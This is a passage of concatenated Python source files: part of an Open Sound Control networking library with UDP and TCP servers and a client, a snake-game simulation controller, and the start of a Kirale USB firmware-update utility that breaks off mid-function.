def addDefaultHandlers(self, prefix="", info_prefix="/info", error_prefix="/error"):
"""Register a default set of OSC-address handlers with this Server:
- 'default' -> noCallback_handler
the given prefix is prepended to all other callbacks registered by this method:
- '<prefix><info_prefix>' -> serverInfo_handler
- '<prefix><error_prefix>' -> msgPrinter_handler
- '<prefix>/print' -> msgPrinter_handler
and, if the used Client supports it;
- '<prefix>/subscribe' -> subscription_handler
- '<prefix>/unsubscribe' -> subscription_handler
Note: the given 'error_prefix' argument is also set as default 'error_prefix' for error-messages
*sent from* this server. This is ok, because error-messages generally do not elicit a reply from the receiver.
To do this with the serverInfo-prefixes would be a bad idea, because if a request received on '/info' (for example)
would send replies to '/info', this could potentially cause a never-ending loop of messages!
Do *not* set the 'info_prefix' here (for incoming serverinfo requests) to the same value as given to
the setSrvInfoPrefix() method (for *replies* to incoming serverinfo requests).
For example, use '/info' for incoming requests, and '/inforeply' or '/serverinfo' or even just '/print' as the
info-reply prefix.
"""
self.error_prefix = error_prefix
self.addMsgHandler('default', self.noCallback_handler)
self.addMsgHandler(prefix + info_prefix, self.serverInfo_handler)
self.addMsgHandler(prefix + error_prefix, self.msgPrinter_handler)
self.addMsgHandler(prefix + '/print', self.msgPrinter_handler)
if isinstance(self.client, OSCMultiClient):
self.addMsgHandler(prefix + '/subscribe', self.subscription_handler)
self.addMsgHandler(prefix + '/unsubscribe', self.subscription_handler)
def printErr(self, txt):
"""Writes 'OSCServer: txt' to sys.stderr
"""
sys.stderr.write("OSCServer: %s\n" % txt)
def sendOSCerror(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'error_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.error_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.error_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
def reportErr(self, txt, client_address):
"""Writes 'OSCServer: txt' to sys.stderr
If self.error_prefix is defined, sends 'txt' as an OSC error-message to the client(s)
(see printErr() and sendOSCerror())
"""
self.printErr(txt)
if len(self.error_prefix):
self.sendOSCerror(txt, client_address)
def sendOSCinfo(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'info_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.info_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.info_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
###
# Message-Handler callback functions
###
def handle_error(self, request, client_address):
"""Handle an exception in the Server's callbacks gracefully.
Writes the error to sys.stderr and, if the error_prefix (see setSrvErrorPrefix()) is set,
sends the error-message as reply to the client
"""
(e_type, e) = sys.exc_info()[:2]
self.printErr("%s on request from %s: %s" % (e_type.__name__, getUrlStr(client_address), str(e)))
if self.print_tracebacks:
import traceback
traceback.print_exc() # XXX But this goes to stderr!
if len(self.error_prefix):
self.sendOSCerror("%s: %s" % (e_type.__name__, str(e)), client_address)
def noCallback_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints a "No callback registered to handle ..." message.
Returns None
"""
self.reportErr("No callback registered to handle OSC-address '%s'" % addr, client_address)
def msgPrinter_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints the received message.
Returns None
"""
txt = "OSCMessage '%s' from %s: " % (addr, getUrlStr(client_address))
txt += str(data)
self.printErr(txt)
def serverInfo_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler returns a reply to the client, which can contain various bits of information
about this server, depending on the first argument of the received OSC-message:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'address <string>' messages, listing the server's
OSC address-space.
- 'clients' | 'targets' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
"""
if len(data) == 0:
return None
cmd = data.pop(0)
reply = None
if cmd in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('info_command', "ls | list : list OSC address-space"))
reply.append(('info_command', "clients | targets : list subscribed clients"))
elif cmd in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for addr in list(self.callbacks.keys()):
reply.append(('address', addr))
elif cmd in ('clients', 'targets'):
if hasattr(self.client, 'getOSCTargetStrings'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
else:
cli_addr = self.client.address()
if cli_addr:
reply = OSCMessage(self.info_prefix)
reply.append(('target', "osc://%s/" % getUrlStr(cli_addr)))
else:
self.reportErr("unrecognized command '%s' in /info request from osc://%s. Try 'help'" % (cmd, getUrlStr(client_address)), client_address)
return reply
def _subscribe(self, data, client_address):
"""Handle the actual subscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>] [<filter>] [...]' string, which is then passed to
parseUrlStr() & parseFilterStr() to actually retrieve <host>, <port>, etc.
This 'long way 'round' approach (almost) guarantees that the subscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (isinstance(item,int)) and not have_port:
url += ":%d" % item
have_port = True
elif isinstance(item,str):
url += item
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
if addr != None:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
port = client_address[1]
addr = (host, port)
else:
addr = client_address
self.client._setTarget(addr, prefix, filters)
trg = self.client.getOSCTargetStr(addr)
if trg[0] != None:
reply = OSCMessage(self.info_prefix)
reply.append(('target',) + trg)
return reply
def _unsubscribe(self, data, client_address):
"""Handle the actual unsubscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>]' string, which is then passed to
parseUrlStr() to actually retrieve <host>, <port> & <prefix>.
This 'long way 'round' approach (almost) guarantees that the unsubscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (isinstance(item,int)) and not have_port:
url += ":%d" % item
have_port = True
elif isinstance(item,str):
url += item
(addr, _) = parseUrlStr(url)
if addr == None:
addr = client_address
else:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
try:
(host, port) = self.client._searchHostAddr(host)
except NotSubscribedError:
port = client_address[1]
addr = (host, port)
try:
self.client._delTarget(addr)
except NotSubscribedError as e:
txt = "%s: %s" % (e.__class__.__name__, str(e))
self.printErr(txt)
reply = OSCMessage(self.error_prefix)
reply.append(txt)
return reply
def subscription_handler(self, addr, tags, data, client_address):
"""Handle 'subscribe' / 'unsubscribe' requests from remote hosts,
if the local Client supports this (i.e. OSCMultiClient).
Supported commands:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
- '[subscribe | listen | sendto | target] <url> [<filter> ...] : Subscribe remote client/server at <url>,
and/or set message-filters for messages being sent to the subscribed host, with the optional <filter>
arguments. Filters are given as OSC-addresses (or '*') prefixed by a '+' (send matching messages) or
a '-' (don't send matching messages). The wildcard '*', '+*' or '+/*' means 'send all' / 'filter none',
and '-*' or '-/*' means 'send none' / 'filter all' (which is not the same as unsubscribing!)
Reply is an OSCMessage with the (new) subscription; 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
- '[unsubscribe | silence | nosend | deltarget] <url> : Unsubscribe remote client/server at <url>
If the given <url> isn't subscribed, a NotSubscribedError-message is printed (and possibly sent)
The <url> given to the subscribe/unsubscribe handler should be of the form:
'[osc://][<host>][:<port>][<prefix>]', where any or all components can be omitted.
If <host> is not specified, the IP-address of the message's source is used.
If <port> is not specified, the <host> is first looked up in the list of subscribed hosts, and if found,
the associated port is used.
If <port> is not specified and <host> is not yet subscribed, the message's source-port is used.
If <prefix> is specified on subscription, <prefix> is prepended to the OSC-address of all messages
sent to the subscribed host.
If <prefix> is specified on unsubscription, the subscribed host is only unsubscribed if the host,
port and prefix all match the subscription.
If <prefix> is not specified on unsubscription, the subscribed host is unsubscribed if the host and port
match the subscription.
"""
if not isinstance(self.client, OSCMultiClient):
raise OSCServerError("Local %s does not support subsctiptions or message-filtering" % self.client.__class__.__name__)
addr_cmd = addr.split('/')[-1]
if len(data):
if data[0] in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('subscribe_command', "ls | list : list subscribed targets"))
reply.append(('subscribe_command', "[subscribe | listen | sendto | target] <url> [<filter> ...] : subscribe to messages, set filters"))
reply.append(('subscribe_command', "[unsubscribe | silence | nosend | deltarget] <url> : unsubscribe from messages"))
return reply
if data[0] in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
return reply
if data[0] in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data[1:], client_address)
if data[0] in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data[1:], client_address)
if addr_cmd in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data, client_address)
if addr_cmd in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data, client_address)
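# Minimal, hedged OSCServer setup sketch (address and timing are placeholders;
# serve_forever() blocks, so it is typically run in its own thread -- 'threading'
# is already imported by this module):
#
#   server = OSCServer(('127.0.0.1', 9000))
#   server.addDefaultHandlers()
#   t = threading.Thread(target=server.serve_forever)
#   t.start()
#   ...                      # clients send messages to 127.0.0.1:9000 here
#   server.close()
#   t.join()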
class ForkingOSCServer(ForkingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server forks a new process to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
class ThreadingOSCServer(ThreadingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server starts a new thread to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
######
#
# OSCError classes
#
######
class OSCError(Exception):
"""Base Class for all OSC-related errors
"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class OSCClientError(OSCError):
"""Class for all OSCClient errors
"""
pass
class OSCServerError(OSCError):
"""Class for all OSCServer errors
"""
pass
class NoCallbackError(OSCServerError):
"""This error is raised (by an OSCServer) when an OSCMessage with an 'unmatched' address-pattern
is received, and no 'default' handler is registered.
"""
def __init__(self, pattern):
"""The specified 'pattern' should be the OSC-address of the 'unmatched' message causing the error to be raised.
"""
self.message = "No callback registered to handle OSC-address '%s'" % pattern
class NotSubscribedError(OSCClientError):
"""This error is raised (by an OSCMultiClient) when an attempt is made to unsubscribe a host
that isn't subscribed.
"""
def __init__(self, addr, prefix=None):
if prefix:
url = getUrlStr(addr, prefix)
else:
url = getUrlStr(addr, '')
self.message = "Target osc://%s is not subscribed" % url
######
#
# OSC over streaming transport layers (usually TCP)
#
# Note from the OSC 1.0 specifications about streaming protocols:
#
# The underlying network that delivers an OSC packet is responsible for
# delivering both the contents and the size to the OSC application. An OSC
# packet can be naturally represented by a datagram by a network protocol such
# as UDP. In a stream-based protocol such as TCP, the stream should begin with
# an int32 giving the size of the first packet, followed by the contents of the
# first packet, followed by the size of the second packet, etc.
#
# The contents of an OSC packet must be either an OSC Message or an OSC Bundle.
# The first byte of the packet's contents unambiguously distinguishes between
# these two alternatives.
#
######
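# Framing sketch for the note above (it mirrors what _transmitMsg()/_receiveMsg()
# below do; 'sock' and 'msg' are assumed to exist and are not defined here):
#
#   binary = msg.getBinary()
#   sock.sendall(struct.pack(">L", len(binary)) + binary)   # 4-byte big-endian size, then payload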
class OSCStreamRequestHandler(StreamRequestHandler, OSCAddressSpace):
""" This is the central class of a streaming OSC server. If a client
connects to the server, the server instantiates a OSCStreamRequestHandler
for each new connection. This is fundamentally different to a packet
oriented server which has a single address space for all connections.
This connection based (streaming) OSC server maintains an address space
for each single connection, because TCP servers usually spawn a new thread
or process for each new connection. This would generate severe
multithreading synchronization problems when each thread would operate on
the same address space object. Therefore: To implement a streaming/TCP OSC
server a custom handler must be implemented which implements the
setupAddressSpace member in which it creates its own address space for this
very connection. This has been done within the testbench and can serve as
inspiration.
"""
def __init__(self, request, client_address, server):
""" Initialize all base classes. The address space must be initialized
before the stream request handler because the initialization function
of the stream request handler calls the setup member which again
requires an already initialized address space.
"""
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
StreamRequestHandler.__init__(self, request, client_address, server)
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def setup(self):
StreamRequestHandler.setup(self)
print("SERVER: New client connection.")
self.setupAddressSpace()
self.server._clientRegister(self)
def setupAddressSpace(self):
""" Override this function to customize your address space. """
pass
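# Hedged sketch of a custom stream handler: override setupAddressSpace() to register
# per-connection callbacks (the class and address names below are made up):
#
#   class MyStreamHandler(OSCStreamRequestHandler):
#       def setupAddressSpace(self):
#           self.addMsgHandler('/ping', self.ping_handler)
#       def ping_handler(self, addr, tags, data, client_address):
#           return OSCMessage('/pong')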
def finish(self):
StreamRequestHandler.finish(self)
self.server._clientUnregister(self)
print("SERVER: Client connection handled.")
def _transmit(self, data):
sent = 0
while sent < len(data):
tmp = self.connection.send(data[sent:])
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsg(self, msg):
"""Send an OSC message over a streaming socket. Raises exception if it
should fail. If everything is transmitted properly, True is returned. If
socket has been closed, False.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
try:
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = struct.pack(">L", length)
if self._transmit(len_big_endian) and self._transmit(binary):
return True
return False
except socket.error as e:
if e.errno == errno.EPIPE: # broken pipe
return False
raise e
def _receive(self, count):
""" Receive a certain amount of data from the socket and return it. If the
remote end is closed in the meantime, None is returned.
"""
chunk = self.connection.recv(count)
if not chunk or len(chunk) == 0:
return None
while len(chunk) < count:
tmp = self.connection.recv(count - len(chunk))
if not tmp or len(tmp) == 0:
return None
chunk = chunk + tmp
return chunk
def _receiveMsg(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receive(4)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receive(slen)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# decode OSC data and dispatch
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("SERVER: Message decoding failed.")
return msg
def handle(self):
"""
Handle a connection.
"""
# set socket blocking to avoid "resource currently not available"
# exceptions, because the connection socket inherits the settings
# from the listening socket and this times out from time to time
# in order to provide a way to shut the server down. But we want
# clean and blocking behaviour here
self.connection.settimeout(None)
print("SERVER: Entered server loop")
try:
while True:
decoded = self._receiveMsg()
if decoded == None:
return
elif len(decoded) <= 0:
# if message decoding fails we try to stay in sync but print a message
print("OSC stream server: Spurious message received.")
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
# no replies, continue receiving
continue
self._txMutex.acquire()
txOk = self._transmitMsg(msg)
self._txMutex.release()
if not txOk:
break
except socket.error as e:
if e.errno == errno.ECONNRESET:
# if connection has been reset by client, we do not care much
# about it, we just assume our duty fulfilled
print("SERVER: Connection has been reset by peer.")
else:
raise e
def sendOSC(self, oscData):
""" This member can be used to transmit OSC messages or OSC bundles
over the client/server connection. It is thread-safe.
"""
self._txMutex.acquire()
result = self._transmitMsg(oscData)
self._txMutex.release()
return result
""" TODO Note on threaded unbundling for streaming (connection oriented)
transport:
Threaded unbundling as implemented in ThreadingOSCServer must be implemented in
a different way for the streaming variant, because contrary to the datagram
version the streaming handler is instantiated only once per connection. This
leads to the problem (if threaded unbundling is implemented as in OSCServer)
that all further message reception is blocked until all (previously received)
pending messages are processed.
Each StreamRequestHandler should provide a so called processing queue in which
all pending messages or subbundles are inserted to be processed in the future.
When a subbundle or message gets queued, a mechanism must be provided that
those messages get invoked when time asks for them. There are the following
opportunities:
- a timer is started which checks at regular intervals for messages in the
queue (polling - requires CPU resources)
- a dedicated timer is started for each message (requires timer resources)
"""
class OSCStreamingServer(TCPServer):
""" A connection oriented (TCP/IP) OSC server.
"""
# define a socket timeout, so the serve_forever loop can actually exit.
# with 2.6 and server.shutdown this wouldn't be necessary
socket_timeout = 1
# this is the class which handles a new connection. Override this for a
# useful customized server. See the testbench for an example
RequestHandlerClass = OSCStreamRequestHandler
def __init__(self, address):
"""Instantiate an OSCStreamingServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens for new connections.
"""
self._clientList = []
self._clientListMutex = threading.Lock()
TCPServer.__init__(self, address, self.RequestHandlerClass)
self.socket.settimeout(self.socket_timeout)
def serve_forever(self):
"""Handle one request at a time until server is closed.
Had to add this since 2.5 does not support server.shutdown()
"""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def start(self):
""" Start the server thread. """
self._server_thread = threading.Thread(target=self.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
def stop(self):
""" Stop the server thread and close the socket. """
self.running = False
self._server_thread.join()
self.server_close()
# 2.6 only
#self.shutdown()
def _clientRegister(self, client):
""" Gets called by each request/connection handler when connection is
established to add itself to the client list
"""
self._clientListMutex.acquire()
self._clientList.append(client)
self._clientListMutex.release()
def _clientUnregister(self, client):
""" Gets called by each request/connection handler when connection is
lost to remove itself from the client list
"""
self._clientListMutex.acquire()
self._clientList.remove(client)
self._clientListMutex.release()
def broadcastToClients(self, oscData):
""" Send OSC message or bundle to all connected clients. """
result = True
for client in self._clientList:
result = result and client.sendOSC(oscData)
return result
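# Minimal, hedged server-side sketch (address and handler class are placeholders;
# MyStreamHandler refers to the kind of subclass sketched earlier above):
#
#   class MyStreamingServer(OSCStreamingServer):
#       RequestHandlerClass = MyStreamHandler
#
#   server = MyStreamingServer(('127.0.0.1', 9000))
#   server.start()                       # serves connections in a background thread
#   server.broadcastToClients(OSCMessage('/status'))
#   server.stop()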
class OSCStreamingServerThreading(ThreadingMixIn, OSCStreamingServer):
""" Implements a server which spawns a separate thread for each incoming
connection. Care must be taken since the OSC address space is the same
for all connections.
"""
pass
class OSCStreamingClient(OSCAddressSpace):
""" OSC streaming client.
A streaming client establishes a connection to a streaming server but must
be able to handle replies by the server as well. To accomplish this the
receiving takes place in a secondary thread, because no one knows if we
have to expect a reply or not, i.e. synchronous architecture doesn't make
much sense.
Replies will be matched against the local address space. If message
handlers access code of the main thread (where the client messages are sent
to the server) care must be taken e.g. by installing synchronization
mechanisms or by using an event dispatcher which can handle events
originating from other threads.
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
rcvbuf_size = 4096 * 8
def __init__(self):
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.rcvbuf_size)
self.socket.settimeout(1.0)
self._running = False
def _receiveWithTimeout(self, count):
chunk = bytes()
while len(chunk) < count:
try:
tmp = self.socket.recv(count - len(chunk))
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return None
else:
continue
except socket.error as e:
if e.errno == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return None
else:
raise e
if not tmp or len(tmp) == 0:
print("CLIENT: Socket has been closed.")
return None
chunk = chunk + tmp
return chunk
def _receiveMsgWithTimeout(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receiveWithTimeout(4)
if not chunk:
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receiveWithTimeout(slen)
if not chunk:
return None
# decode OSC content
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("CLIENT: Message decoding failed.")
return msg
def _receiving_thread_entry(self):
print("CLIENT: Entered receiving thread.")
self._running = True
while self._running:
decoded = self._receiveMsgWithTimeout()
if not decoded:
break
elif len(decoded) <= 0:
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
continue
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
if not txOk:
break
print("CLIENT: Receiving thread terminated.")
def _unbundle(self, decoded):
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.socket.getpeername())
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def connect(self, address):
self.socket.connect(address)
self.receiving_thread = threading.Thread(target=self._receiving_thread_entry)
self.receiving_thread.start()
def close(self):
# let socket time out
self._running = False
self.receiving_thread.join()
self.socket.close()
def _transmitWithTimeout(self, data):
sent = 0
while sent < len(data):
try:
tmp = self.socket.send(data[sent:])
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return False
else:
continue
except socket.error as e:
if e.errno == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return False
else:
raise e
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsgWithTimeout(self, msg):
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = struct.pack(">L", length)
if self._transmitWithTimeout(len_big_endian) and self._transmitWithTimeout(binary):
return True
else:
return False
def sendOSC(self, msg):
"""Send an OSC message or bundle to the server. Returns True on success.
"""
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
return txOk
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
try:
addr = self.socket.getpeername()
except socket.error:
addr = None
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
return self.socket == other.socket
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
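# Minimal, hedged OSCStreamingClient sketch (server address is a placeholder;
# replies from the server are dispatched to handlers registered on the client):
#
#   client = OSCStreamingClient()
#   client.addMsgHandler('/pong', lambda addr, tags, data, src: print("pong", data))
#   client.connect(('127.0.0.1', 9000))
#   client.sendOSC(OSCMessage('/ping'))
#   client.close()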
|
singlesimcontroller.py
|
from threading import Thread, Lock
from time import sleep
from domain.evaluation import Evaluation
from view.singlesimview import SingleSimView
class SingleSimController:
"""Controller class for controlling the simulation of a single game for a single snake."""
def __init__(self, snake, uithread):
self.uithread = uithread
self.snake = snake
self.evaluation = Evaluation(snake)
self.singlesimview = SingleSimView()
self.singlesimview.add_listener(self)
self.uithread.run_on_ui_thread(lambda:
self.singlesimview.show_game_board(self.evaluation.board,
self.evaluation.current_game.moves,
self.evaluation.current_game.score))
self.simulation_step_loop_lock = Lock()
self.step_loop_interval = 5
self.simulation_step_loop_active = False
self.can_update_window = True
def on_close_simulation_window(self):
self.simulation_step_loop_active = False
self.can_update_window = False
self.singlesimview.close()
def on_set_interval(self, interval_value):
self.step_loop_interval = interval_value
def on_click_start(self):
if not self.simulation_step_loop_active:
self.simulation_step_loop_active = True
simulation_step_loop_thread = Thread(target=self.simulation_step_loop)
simulation_step_loop_thread.start()
def on_click_pause(self):
self.simulation_step_loop_active = False
def on_click_step(self):
self.simulation_step()
def simulation_step_loop(self):
self.simulation_step_loop_lock.acquire()
while self.simulation_step_loop_active:
self.simulation_step()
sleep(self.step_loop_interval/1000)
self.simulation_step_loop_lock.release()
def simulation_step(self):
if self.evaluation.current_game.finished:
self.simulation_step_loop_active = False
else:
self.evaluation.current_game.step() # Step the current game
if self.can_update_window:
self.uithread.run_on_ui_thread(lambda:
self.singlesimview.show_game_board(self.evaluation.board,
self.evaluation.current_game.moves,
self.evaluation.current_game.score))
|
kifwu.py
|
'''Kirale firmware update functions'''
from __future__ import print_function
import itertools
import os
import platform
import struct
import sys
import time
from threading import Thread, RLock
import colorama
from tqdm import tqdm
import usb.backend.libusb1 as libusb1
import usb.core
import usb.util
from kitools import kicmds, kidfu, kiserial
BACKEND = None
KIRALE_VID = 0x2DEF
MAX_PARALLEL_DEVICES = 18
if sys.version_info > (3, 0):
import queue as queue_
else:
import Queue as queue_
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))
return os.path.join(os.path.abspath(base_path), relative_path)
def try_input(txt=None):
'''Normal input but catching the keyboard interruption'''
sys.stdout.write(
'%s%s%s%s%s '
% (
colorama.Style.BRIGHT,
colorama.Back.BLUE,
colorama.Fore.WHITE,
txt,
colorama.Style.RESET_ALL,
)
)
try:
if sys.version_info > (3, 0):
typed = input().strip()
else:
typed = raw_input().strip() # pylint: disable=E0602
except (KeyboardInterrupt, EOFError):
sys.exit('Program finished by the user.')
return typed
def colorize(msg, color):
'''Return the message colorized'''
return '%s%s%s' % (color, msg, colorama.Fore.RESET)
def sys_exit(msg):
'''Exit with a red message'''
sys.exit(colorize(msg, colorama.Fore.RED))
def backend_init():
# Initialize backend
global BACKEND
BACKEND = libusb1.get_backend()
if not BACKEND:
# Set the libusb path
        if platform.system() == 'Windows':
if '32bit' in str(platform.architecture()):
LIBUSB_PATH = resource_path('libusb\\MS32\\libusb-1.0.dll')
else:
LIBUSB_PATH = resource_path('libusb\\MS64\\libusb-1.0.dll')
BACKEND = libusb1.get_backend(find_library=lambda x: LIBUSB_PATH)
if not BACKEND:
sys_exit('No USB library found.')
def get_usb_devices():
'''Return a list of connected Kirale USB devices'''
return usb.core.find(idVendor=KIRALE_VID, find_all=True, backend=BACKEND)
def get_dfu_devices(size, is_boot=False, timeout=15, required=True):
'''Return a list of connected Kirale DFU devices'''
devs = []
for _ in itertools.repeat(None, timeout):
devs = []
for dev in get_usb_devices():
if is_boot and dev.idProduct == kidfu.KINOS_DFU_PID:
devs.append(dev)
elif not is_boot and dev.idProduct != kidfu.KINOS_DFU_PID:
devs.append(dev)
else:
usb.util.dispose_resources(dev)
if len(devs) >= size:
break
for dev in devs:
usb.util.dispose_resources(dev)
print('.', end='')
time.sleep(1)
print('')
if required:
# Initialize DFU devices
dfus = []
for dev in devs:
# Detach kernel driver
        if platform.system() != 'Windows':
for config in dev:
for i in range(config.bNumInterfaces):
try:
if dev.is_kernel_driver_active(i):
dev.detach_kernel_driver(i)
except:
pass
dfus.append(kidfu.KiDfuDevice(dev))
return dfus
def dfu_find_and_flash(dfu_file, unattended=False, snum=None):
'''Flash a DFU file'''
backend_init()
run_dfus_selected = []
boot_dfus_selected = []
dfus_selected = []
# Find run-time Kirale devices
run_dfus = get_dfu_devices(0, is_boot=False)
if run_dfus:
if not snum:
run_dfus_selected = run_dfus
else:
# Filter out
for dfu in run_dfus:
if dfu.get_string(dfu.dev.iSerialNumber) in snum:
run_dfus_selected.append(dfu)
else:
usb.util.dispose_resources(dfu.dev)
print('List of %d run-time devices:' % len(run_dfus_selected))
if not run_dfus_selected:
return
# Detach KiNOS running devices
for dfu in run_dfus_selected:
try:
print(dfu)
dfu.detach(0)
except usb.core.USBError:
pass
usb.util.dispose_resources(dfu.dev)
# Wait until all devices are detached
